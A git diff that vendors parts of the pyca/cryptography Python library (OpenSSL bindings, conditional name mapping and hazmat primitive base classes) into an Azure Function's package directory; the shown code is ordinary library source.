"DTLS_get_data_mtu", + ] + + +def cryptography_has_300_fips() -> typing.List[str]: + return [ + "EVP_default_properties_is_fips_enabled", + "EVP_default_properties_enable_fips", + ] + + +def cryptography_has_ssl_cookie() -> typing.List[str]: + return [ + "SSL_OP_COOKIE_EXCHANGE", + "DTLSv1_listen", + "SSL_CTX_set_cookie_generate_cb", + "SSL_CTX_set_cookie_verify_cb", + ] + + +def cryptography_has_pkcs7_funcs() -> typing.List[str]: + return [ + "SMIME_write_PKCS7", + "PEM_write_bio_PKCS7_stream", + "PKCS7_sign_add_signer", + "PKCS7_final", + "PKCS7_verify", + "SMIME_read_PKCS7", + "PKCS7_get0_signers", + ] + + +def cryptography_has_bn_flags() -> typing.List[str]: + return [ + "BN_FLG_CONSTTIME", + "BN_set_flags", + "BN_prime_checks_for_size", + ] + + +def cryptography_has_evp_pkey_dh() -> typing.List[str]: + return [ + "EVP_PKEY_set1_DH", + ] + + +def cryptography_has_300_evp_cipher() -> typing.List[str]: + return ["EVP_CIPHER_fetch", "EVP_CIPHER_free"] + + +def cryptography_has_unexpected_eof_while_reading() -> typing.List[str]: + return ["SSL_R_UNEXPECTED_EOF_WHILE_READING"] + + +# This is a mapping of +# {condition: function-returning-names-dependent-on-that-condition} so we can +# loop over them and delete unsupported names at runtime. It will be removed +# when cffi supports #if in cdef. We use functions instead of just a dict of +# lists so we can use coverage to measure which are used. 
+CONDITIONAL_NAMES = { + "Cryptography_HAS_EC2M": cryptography_has_ec2m, + "Cryptography_HAS_SSL3_METHOD": cryptography_has_ssl3_method, + "Cryptography_HAS_110_VERIFICATION_PARAMS": ( + cryptography_has_110_verification_params + ), + "Cryptography_HAS_SET_CERT_CB": cryptography_has_set_cert_cb, + "Cryptography_HAS_SSL_ST": cryptography_has_ssl_st, + "Cryptography_HAS_TLS_ST": cryptography_has_tls_st, + "Cryptography_HAS_SCRYPT": cryptography_has_scrypt, + "Cryptography_HAS_EVP_PKEY_DHX": cryptography_has_evp_pkey_dhx, + "Cryptography_HAS_MEM_FUNCTIONS": cryptography_has_mem_functions, + "Cryptography_HAS_X509_STORE_CTX_GET_ISSUER": ( + cryptography_has_x509_store_ctx_get_issuer + ), + "Cryptography_HAS_ED448": cryptography_has_ed448, + "Cryptography_HAS_ED25519": cryptography_has_ed25519, + "Cryptography_HAS_POLY1305": cryptography_has_poly1305, + "Cryptography_HAS_ONESHOT_EVP_DIGEST_SIGN_VERIFY": ( + cryptography_has_oneshot_evp_digest_sign_verify + ), + "Cryptography_HAS_EVP_PKEY_get_set_tls_encodedpoint": ( + cryptography_has_evp_pkey_get_set_tls_encodedpoint + ), + "Cryptography_HAS_FIPS": cryptography_has_fips, + "Cryptography_HAS_PSK": cryptography_has_psk, + "Cryptography_HAS_PSK_TLSv1_3": cryptography_has_psk_tlsv13, + "Cryptography_HAS_CUSTOM_EXT": cryptography_has_custom_ext, + "Cryptography_HAS_OPENSSL_CLEANUP": cryptography_has_openssl_cleanup, + "Cryptography_HAS_TLSv1_3": cryptography_has_tlsv13, + "Cryptography_HAS_TLSv1_3_FUNCTIONS": cryptography_has_tlsv13_functions, + "Cryptography_HAS_KEYLOG": cryptography_has_keylog, + "Cryptography_HAS_RAW_KEY": cryptography_has_raw_key, + "Cryptography_HAS_EVP_DIGESTFINAL_XOF": ( + cryptography_has_evp_digestfinal_xof + ), + "Cryptography_HAS_ENGINE": cryptography_has_engine, + "Cryptography_HAS_VERIFIED_CHAIN": cryptography_has_verified_chain, + "Cryptography_HAS_SRTP": cryptography_has_srtp, + "Cryptography_HAS_GET_PROTO_VERSION": cryptography_has_get_proto_version, + "Cryptography_HAS_PROVIDERS": cryptography_has_providers, + "Cryptography_HAS_OP_NO_RENEGOTIATION": ( + cryptography_has_op_no_renegotiation + ), + "Cryptography_HAS_DTLS_GET_DATA_MTU": cryptography_has_dtls_get_data_mtu, + "Cryptography_HAS_300_FIPS": cryptography_has_300_fips, + "Cryptography_HAS_SSL_COOKIE": cryptography_has_ssl_cookie, + "Cryptography_HAS_PKCS7_FUNCS": cryptography_has_pkcs7_funcs, + "Cryptography_HAS_BN_FLAGS": cryptography_has_bn_flags, + "Cryptography_HAS_EVP_PKEY_DH": cryptography_has_evp_pkey_dh, + "Cryptography_HAS_300_EVP_CIPHER": cryptography_has_300_evp_cipher, + "Cryptography_HAS_UNEXPECTED_EOF_WHILE_READING": ( + cryptography_has_unexpected_eof_while_reading + ), +} diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/binding.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/binding.py new file mode 100644 index 0000000..6526c02 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/bindings/openssl/binding.py @@ -0,0 +1,230 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
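Before the binding code below: the CONDITIONAL_NAMES mapping above is consumed by build_conditional_library (defined later in this binding.py), which strips from the lib object every name whose Cryptography_HAS_* flag the compiled _openssl extension reports as false. A minimal feature-detection sketch against that pruned lib, assuming a standard pyca/cryptography install (Cryptography_HAS_TLSv1_3 and TLS1_3_VERSION are among the names mapped above):

    from cryptography.hazmat.bindings.openssl.binding import Binding

    binding = Binding()  # first instantiation performs the one-time FFI setup
    # Cryptography_HAS_* flags are exposed as integers on the pruned lib; when
    # a flag is 0, the names its mapped function returns are absent entirely.
    if binding.lib.Cryptography_HAS_TLSv1_3:
        print("TLS 1.3 constants available:", binding.lib.TLS1_3_VERSION)
    else:
        # here getattr(binding.lib, "TLS1_3_VERSION") raises AttributeError
        print("TLS 1.3 names were pruned from the conditional lib")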
+ + +import threading +import types +import typing +import warnings + +import cryptography +from cryptography import utils +from cryptography.exceptions import InternalError +from cryptography.hazmat.bindings._openssl import ffi, lib +from cryptography.hazmat.bindings.openssl._conditional import CONDITIONAL_NAMES + +_OpenSSLErrorWithText = typing.NamedTuple( + "_OpenSSLErrorWithText", + [("code", int), ("lib", int), ("reason", int), ("reason_text", bytes)], +) + + +class _OpenSSLError: + def __init__(self, code: int, lib: int, reason: int): + self._code = code + self._lib = lib + self._reason = reason + + def _lib_reason_match(self, lib: int, reason: int) -> bool: + return lib == self.lib and reason == self.reason + + @property + def code(self) -> int: + return self._code + + @property + def lib(self) -> int: + return self._lib + + @property + def reason(self) -> int: + return self._reason + + +def _consume_errors(lib) -> typing.List[_OpenSSLError]: + errors = [] + while True: + code: int = lib.ERR_get_error() + if code == 0: + break + + err_lib: int = lib.ERR_GET_LIB(code) + err_reason: int = lib.ERR_GET_REASON(code) + + errors.append(_OpenSSLError(code, err_lib, err_reason)) + + return errors + + +def _errors_with_text( + errors: typing.List[_OpenSSLError], +) -> typing.List[_OpenSSLErrorWithText]: + errors_with_text = [] + for err in errors: + buf = ffi.new("char[]", 256) + lib.ERR_error_string_n(err.code, buf, len(buf)) + err_text_reason: bytes = ffi.string(buf) + + errors_with_text.append( + _OpenSSLErrorWithText( + err.code, err.lib, err.reason, err_text_reason + ) + ) + + return errors_with_text + + +def _consume_errors_with_text(lib): + return _errors_with_text(_consume_errors(lib)) + + +def _openssl_assert( + lib, ok: bool, errors: typing.Optional[typing.List[_OpenSSLError]] = None +) -> None: + if not ok: + if errors is None: + errors = _consume_errors(lib) + errors_with_text = _errors_with_text(errors) + + raise InternalError( + "Unknown OpenSSL error. This error is commonly encountered when " + "another library is not cleaning up the OpenSSL error stack. If " + "you are using cryptography with another library that uses " + "OpenSSL try disabling it before reporting a bug. Otherwise " + "please file an issue at https://github.com/pyca/cryptography/" + "issues with information on how to reproduce " + "this. ({0!r})".format(errors_with_text), + errors_with_text, + ) + + +def build_conditional_library(lib, conditional_names): + conditional_lib = types.ModuleType("lib") + conditional_lib._original_lib = lib # type: ignore[attr-defined] + excluded_names = set() + for condition, names_cb in conditional_names.items(): + if not getattr(lib, condition): + excluded_names.update(names_cb()) + + for attr in dir(lib): + if attr not in excluded_names: + setattr(conditional_lib, attr, getattr(lib, attr)) + + return conditional_lib + + +class Binding: + """ + OpenSSL API wrapper. + """ + + lib: typing.ClassVar = None + ffi = ffi + _lib_loaded = False + _init_lock = threading.Lock() + _legacy_provider: typing.Any = None + _default_provider: typing.Any = None + + def __init__(self): + self._ensure_ffi_initialized() + + def _enable_fips(self) -> None: + # This function enables FIPS mode for OpenSSL 3.0.0 on installs that + # have the FIPS provider installed properly. 
+ _openssl_assert(self.lib, self.lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER) + self._base_provider = self.lib.OSSL_PROVIDER_load( + self.ffi.NULL, b"base" + ) + _openssl_assert(self.lib, self._base_provider != self.ffi.NULL) + self.lib._fips_provider = self.lib.OSSL_PROVIDER_load( + self.ffi.NULL, b"fips" + ) + _openssl_assert(self.lib, self.lib._fips_provider != self.ffi.NULL) + + res = self.lib.EVP_default_properties_enable_fips(self.ffi.NULL, 1) + _openssl_assert(self.lib, res == 1) + + @classmethod + def _register_osrandom_engine(cls): + # Clear any errors extant in the queue before we start. In many + # scenarios other things may be interacting with OpenSSL in the same + # process space and it has proven untenable to assume that they will + # reliably clear the error queue. Once we clear it here we will + # error on any subsequent unexpected item in the stack. + cls.lib.ERR_clear_error() + if cls.lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE: + result = cls.lib.Cryptography_add_osrandom_engine() + _openssl_assert(cls.lib, result in (1, 2)) + + @classmethod + def _ensure_ffi_initialized(cls): + with cls._init_lock: + if not cls._lib_loaded: + cls.lib = build_conditional_library(lib, CONDITIONAL_NAMES) + cls._lib_loaded = True + cls._register_osrandom_engine() + # As of OpenSSL 3.0.0 we must register a legacy cipher provider + # to get RC2 (needed for junk asymmetric private key + # serialization), RC4, Blowfish, IDEA, SEED, etc. These things + # are ugly legacy, but we aren't going to get rid of them + # any time soon. + if cls.lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER: + cls._legacy_provider = cls.lib.OSSL_PROVIDER_load( + cls.ffi.NULL, b"legacy" + ) + _openssl_assert( + cls.lib, cls._legacy_provider != cls.ffi.NULL + ) + cls._default_provider = cls.lib.OSSL_PROVIDER_load( + cls.ffi.NULL, b"default" + ) + _openssl_assert( + cls.lib, cls._default_provider != cls.ffi.NULL + ) + + @classmethod + def init_static_locks(cls): + cls._ensure_ffi_initialized() + + +def _verify_openssl_version(lib): + if ( + lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 + and not lib.CRYPTOGRAPHY_IS_LIBRESSL + and not lib.CRYPTOGRAPHY_IS_BORINGSSL + ): + warnings.warn( + "OpenSSL version 1.1.0 is no longer supported by the OpenSSL " + "project, please upgrade. The next release of cryptography will " + "be the last to support compiling with OpenSSL 1.1.0.", + utils.DeprecatedIn37, + ) + + +def _verify_package_version(version): + # Occasionally we run into situations where the version of the Python + # package does not match the version of the shared object that is loaded. + # This may occur in environments where multiple versions of cryptography + # are installed and available in the python path. To avoid errors cropping + # up later this code checks that the currently imported package and the + # shared object that were loaded have the same version and raise an + # ImportError if they do not + so_package_version = ffi.string(lib.CRYPTOGRAPHY_PACKAGE_VERSION) + if version.encode("ascii") != so_package_version: + raise ImportError( + "The version of cryptography does not match the loaded " + "shared object. This can happen if you have multiple copies of " + "cryptography installed in your Python path. Please try creating " + "a new virtual environment to resolve this issue. 
" + "Loaded python version: {}, shared object version: {}".format( + version, so_package_version + ) + ) + + +_verify_package_version(cryptography.__version__) + +Binding.init_static_locks() + +_verify_openssl_version(Binding.lib) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..45b024c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc new file mode 100644 index 0000000..c375115 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_asymmetric.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc new file mode 100644 index 0000000..68940fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_cipheralgorithm.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc new file mode 100644 index 0000000..98a23f2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/_serialization.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc new file mode 100644 index 0000000..0e03a39 Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/cmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc new file mode 100644 index 0000000..7f0e6bb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/constant_time.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc new file mode 100644 index 0000000..21710fb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hashes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc new file mode 100644 index 0000000..1a2e7cc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/hmac.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc new file mode 100644 index 0000000..984bb38 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/keywrap.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc new file mode 100644 index 0000000..c8079fa Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/padding.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc new file mode 100644 index 0000000..7eb591f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/__pycache__/poly1305.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_asymmetric.py 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_asymmetric.py new file mode 100644 index 0000000..a4c9d96 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_asymmetric.py @@ -0,0 +1,17 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc + + +# This exists to break an import cycle. It is normally accessible from the +# asymmetric padding module. + + +class AsymmetricPadding(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this padding (e.g. "PSS", "PKCS1"). + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_cipheralgorithm.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_cipheralgorithm.py new file mode 100644 index 0000000..d1ef7a5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_cipheralgorithm.py @@ -0,0 +1,40 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc +import typing + + +# This exists to break an import cycle. It is normally accessible from the +# ciphers module. + + +class CipherAlgorithm(metaclass=abc.ABCMeta): + @abc.abstractproperty + def name(self) -> str: + """ + A string naming this mode (e.g. "AES", "Camellia"). + """ + + @abc.abstractproperty + def key_sizes(self) -> typing.FrozenSet[int]: + """ + Valid key sizes for this algorithm in bits + """ + + @abc.abstractproperty + def key_size(self) -> int: + """ + The size of the key being used as an integer in bits (e.g. 128, 256). + """ + + +class BlockCipherAlgorithm(metaclass=abc.ABCMeta): + key: bytes + + @abc.abstractproperty + def block_size(self) -> int: + """ + The size of a block as an integer in bits (e.g. 64, 128). + """ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_serialization.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_serialization.py new file mode 100644 index 0000000..2bc63db --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/_serialization.py @@ -0,0 +1,55 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import abc + +from cryptography import utils + +# This exists to break an import cycle. These classes are normally accessible +# from the serialization module. 
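The Encoding, PrivateFormat, and PublicFormat enums defined just below are re-exported through cryptography.hazmat.primitives.serialization, which is how callers normally reach them. A short sketch of the usual PEM/PKCS8 round trip (standard documented pyca/cryptography usage, not specific to this vendored copy; the passphrase is illustrative):

    from cryptography.hazmat.primitives import serialization
    from cryptography.hazmat.primitives.asymmetric import rsa

    key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    # Encoding.PEM and PrivateFormat.PKCS8 are the enum members defined below;
    # BestAvailableEncryption is the KeySerializationEncryption subclass below.
    pem = key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.PKCS8,
        encryption_algorithm=serialization.BestAvailableEncryption(b"passphrase"),
    )
    loaded = serialization.load_pem_private_key(pem, password=b"passphrase")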
+ + +class Encoding(utils.Enum): + PEM = "PEM" + DER = "DER" + OpenSSH = "OpenSSH" + Raw = "Raw" + X962 = "ANSI X9.62" + SMIME = "S/MIME" + + +class PrivateFormat(utils.Enum): + PKCS8 = "PKCS8" + TraditionalOpenSSL = "TraditionalOpenSSL" + Raw = "Raw" + OpenSSH = "OpenSSH" + + +class PublicFormat(utils.Enum): + SubjectPublicKeyInfo = "X.509 subjectPublicKeyInfo with PKCS#1" + PKCS1 = "Raw PKCS#1" + OpenSSH = "OpenSSH" + Raw = "Raw" + CompressedPoint = "X9.62 Compressed Point" + UncompressedPoint = "X9.62 Uncompressed Point" + + +class ParameterFormat(utils.Enum): + PKCS3 = "PKCS3" + + +class KeySerializationEncryption(metaclass=abc.ABCMeta): + pass + + +class BestAvailableEncryption(KeySerializationEncryption): + def __init__(self, password: bytes): + if not isinstance(password, bytes) or len(password) == 0: + raise ValueError("Password must be 1 or more bytes.") + + self.password = password + + +class NoEncryption(KeySerializationEncryption): + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__init__.py new file mode 100644 index 0000000..171557e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__init__.py @@ -0,0 +1,3 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..10683e0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc new file mode 100644 index 0000000..662a3d7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dh.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc new file mode 100644 index 0000000..005eeb5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/dsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc new file mode 100644 index 0000000..d200375 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ec.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc new file mode 100644 index 0000000..4667d86 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc new file mode 100644 index 0000000..affe396 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/ed448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc new file mode 100644 index 0000000..6ba746f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/padding.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc new file mode 100644 index 0000000..65a36e9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/rsa.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc new file mode 100644 index 0000000..20dcea5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/types.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc 
new file mode 100644 index 0000000..971913b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc new file mode 100644 index 0000000..9cfe410 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x25519.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc new file mode 100644 index 0000000..5bdc998 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/__pycache__/x448.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dh.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dh.py new file mode 100644 index 0000000..121854a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/primitives/asymmetric/dh.py @@ -0,0 +1,250 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. 
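The dh module reproduced below exposes Diffie-Hellman through generate_parameters, the *Numbers classes, and the abstract key interfaces. As a hedged sketch of the documented exchange flow (standard pyca/cryptography usage; parameter sizes are illustrative):

    from cryptography.hazmat.primitives.asymmetric import dh

    # Parameter generation is expensive; both parties must share the result.
    parameters = dh.generate_parameters(generator=2, key_size=2048)
    server_key = parameters.generate_private_key()
    client_key = parameters.generate_private_key()
    # Each side combines its own private key with the peer's public key and
    # arrives at the same shared secret.
    shared_server = server_key.exchange(client_key.public_key())
    shared_client = client_key.exchange(server_key.public_key())
    assert shared_server == shared_client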
